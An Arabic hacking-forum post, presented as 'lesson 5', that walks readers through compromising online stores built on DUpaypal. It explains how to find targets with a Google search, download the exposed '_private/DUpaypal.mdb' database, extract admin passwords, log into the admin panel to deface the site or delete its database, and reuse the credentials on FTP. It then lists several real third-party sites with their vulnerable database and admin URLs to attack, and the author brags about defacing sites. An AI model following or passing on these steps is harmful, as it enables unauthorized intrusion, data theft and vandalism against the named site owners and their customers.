الدرس الخامس (5) حله جديده بعد غياب طويل
بسم الله الرحمن الرحيم
كيف حالكم شباب هكر غبت عليكم كثير كنت مشغول في الهكر والكركر
دورتلكم احسن وافضل الدروس (( لكن زي ماقلتلكم بدينا ندخل في الغويط )):vereymad:
بنطبق نظام جديد يفيدكم ويتعبنيتعليقاتكم على الدروس الي اكتبها اكتبو معها الدروس الي تحتاجونها
مثل برنامج صعب عليكم اشرحه لكم او .............. اي شي في الهكر
الدرس الخامس (5)
شرح الثغره هو اختراق المواقع التجاريه حيث تقوم حذف قاعده البيانات و التعديل فيها ويعتبر ثغره خطيره
تاريخ اكتشاف الثغره يوم 9/2/2005 اي قريب ...
طريقة الاختراق ...
اولا اذهب الى الموقع الهكرز المفضل جوجل google وكتب Powered+by+DUpaypa
او النقر على اللينك المباشر Googel hackers
ثم راح تلقاء مئات الموقع اختار اي موقع واضيف لها الينك التالي
كود:
_private/DUpaypal.mdb
بيصير كذه
http://www.coralspringssales.com/We...te/DUpaypal.mdb
بعدين راح يظهر صفحه تحميل ملف اسمه DUpaypal.mdb حمله لا تخاف هو ملف مو فيروس..
حمله وافتحه بالاكسيس ...
وراح تلقاء زي الصوره التاليه ادخل ملف يوزر وطلع الباسورد
واحيانا يكون اليوزر والباسورد افتراضي اي admin والباسورد password
خلاص ياعم انبسط باقي خطوه
اضيف admin الى اللينك بيصير كذه
http://www.coralspringssales.com/Webs/Ecomm%202/admin
تظهر يا خالو صفحه الدخول المدير في الصورة التاليه ...
خلاص الموقع في يدك سوي للي تحب تحط دعايه لك او تحذف قاعده البيانات
و تضيف تعديلات جديدة زي الصور التاليه :
وخلاص انا دخلت اضافه جديد وحطيت دعايه لي في الموقع وسويت زي الصوره التاليه
واذا تريد الاختراق الكامل للموقع ادخل عبر الاف تي بي وحط اليوزر والباسورد للي معك وراح تخترق الموقع بكله هذا بشرط اذا كان اليوزر والباسورد نفسه في FTP وعن نفسي زبط معي موقعين ...
ببرنامج WS-ftp طبعا ,,
,,,,,,
وهذي مواقع اخر جربو عليها ...
==================================
http://www.arespond.com/DUpaypal%20...te/DUpaypal.mdb الثغرة
http://www.arespond.com/DUpaypal%203.1/admin الدخول عبر الادمن
================================================== =====
httprnbcraze.com/Store%20Front/_private/DUpaypal.mdb الثغرة
httprnbcraze.com/Store%20Front/admin الدخول عبر الادمن
================================================== ===
وهذا علشان عيونكم ..
http://www.bhuvanavijayam.com/bhuva...te/DUpaypal.mdb الثغرة
http://www.bhuvanavijayam.com/bhuvana/products/admin الدخول عبر الادمن
================================================== ====
انتهى الدرس الخامس (5)
ارجو ان يكون في حسن ظنكم وانشالله اني قدرت اوصلكم المعلومه
لكن ياشباب التطبيق اهم شي في عالم الهكر:icon6:
BLAK hAnD
NeW2
VvvV_DRAKOLA_VvvV@hotmail.com
((انها البدايه فقط ))
